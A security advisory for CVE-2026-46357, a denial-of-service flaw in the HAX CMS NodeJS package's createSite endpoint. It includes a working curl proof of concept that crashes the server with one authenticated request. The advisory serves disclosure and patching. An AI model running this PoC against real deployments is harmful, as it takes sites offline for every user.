GHSA-9R33-XHW8-4QQP
Vulnerability from github – Published: 2026-05-19 19:51 – Updated: 2026-05-19 19:51
VLAI
Summary
HAX CMS: Denial of Service using Malicious Import Request
Details
Summary
The HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.
Details
The createSite remote import flow does not complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.
The crash occurs because createSite passes a file object without originalname, while HAXCMSFile.save() immediately dereferences tmpFile.originalname.replace(...).
As a result:
- the request reaches privileged code inside
createSite - the server hits the remote file handling path
- the process crashes before
downloadAndSaveFile()performs the outbound request - no imported file is written into the site directory
Affected Resources
- src/routes/createSite.js:176
- src/lib/HAXCMSFile.js:25
- system/api/createSite
PoC
- Obtain a JWT by logging in with valid credentials.
JWT=$(curl -s -X POST 'http://127.0.0.1:3000/system/api/login' \
-H 'Content-Type: application/json' \
-d '{"username":"admin","password":"admin"}' | grep -o '"jwt":"[^"]*"' | head -1 | cut -d'"' -f4)
- Extract the required tokens from the
connectionSettingsendpoint.
SETTINGS=$(curl -s 'http://127.0.0.1:3000/system/api/connectionSettings')
ROOT_TOKEN=$(printf '%s' "$SETTINGS" | grep -o '"token":"[^"]*"' | head -1 | cut -d'"' -f4)
USER_TOKEN=$(printf '%s' "$SETTINGS" | grep -o 'createSite[^"]*' | grep -o 'user_token=[^"&]*' | cut -d'=' -f2)
- Send the malformed request to crash the server.
curl -i -X POST "http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN&jwt=$JWT" \
-H 'Content-Type: application/json' \
-d "{
\"token\": \"$ROOT_TOKEN\",
\"site\": { \"name\": \"dos-poc\" },
\"theme\": {},
\"build\": {
\"structure\": \"import\",
\"type\": \"import\",
\"items\": [],
\"files\": {
\"files/poc.txt\": \"http://127.0.0.1:8888/poc.txt\"
}
}
}"
The curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading 'replace') and nodemon reports the application as crashed.
Impact
An authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.
Severity
6.5 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@haxtheweb/haxcms-nodejs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46357"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T19:51:51Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.\n\n### Details\n\nThe `createSite` remote import flow does **not** complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.\n\nThe crash occurs because `createSite` passes a file object without `originalname`, while `HAXCMSFile.save()` immediately dereferences `tmpFile.originalname.replace(...)`.\n\nAs a result:\n\n- the request reaches privileged code inside `createSite`\n- the server hits the remote file handling path\n- the process crashes before `downloadAndSaveFile()` performs the outbound request\n- no imported file is written into the site directory\n\n### Affected Resources\n\n- src/routes/createSite.js:176\n- src/lib/HAXCMSFile.js:25\n- system/api/createSite\n\n### PoC\n\n1. Obtain a JWT by logging in with valid credentials.\n\n```bash\nJWT=$(curl -s -X POST \u0027http://127.0.0.1:3000/system/api/login\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"username\":\"admin\",\"password\":\"admin\"}\u0027 | grep -o \u0027\"jwt\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\n```\n\n2. Extract the required tokens from the `connectionSettings` endpoint.\n\n```bash\nSETTINGS=$(curl -s \u0027http://127.0.0.1:3000/system/api/connectionSettings\u0027)\nROOT_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027\"token\":\"[^\"]*\"\u0027 | head -1 | cut -d\u0027\"\u0027 -f4)\nUSER_TOKEN=$(printf \u0027%s\u0027 \"$SETTINGS\" | grep -o \u0027createSite[^\"]*\u0027 | grep -o \u0027user_token=[^\"\u0026]*\u0027 | cut -d\u0027=\u0027 -f2)\n```\n\n3. Send the malformed request to crash the server.\n\n```bash\ncurl -i -X POST \"http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN\u0026jwt=$JWT\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n \\\"token\\\": \\\"$ROOT_TOKEN\\\",\n \\\"site\\\": { \\\"name\\\": \\\"dos-poc\\\" },\n \\\"theme\\\": {},\n \\\"build\\\": {\n \\\"structure\\\": \\\"import\\\",\n \\\"type\\\": \\\"import\\\",\n \\\"items\\\": [],\n \\\"files\\\": {\n \\\"files/poc.txt\\\": \\\"http://127.0.0.1:8888/poc.txt\\\"\n }\n }\n }\"\n```\n\n\u003cimg width=\"953\" height=\"433\" alt=\"Empty-Reply\" src=\"https://github.com/user-attachments/assets/f3562726-2e64-4af6-a06c-8356dc7708da\" /\u003e\n\n\nThe curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading \u0027replace\u0027) and nodemon reports the application as crashed.\n\n\u003cimg width=\"950\" height=\"278\" alt=\"crash-detail\" src=\"https://github.com/user-attachments/assets/1fbc80fb-4c2d-4bc6-af29-c3e9c45e8ad1\" /\u003e\n\n\n### Impact\n\nAn authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.",
"id": "GHSA-9r33-xhw8-4qqp",
"modified": "2026-05-19T19:51:51Z",
"published": "2026-05-19T19:51:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-9r33-xhw8-4qqp"
},
{
"type": "PACKAGE",
"url": "https://github.com/haxtheweb/issues"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "HAX CMS: Denial of Service using Malicious Import Request"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…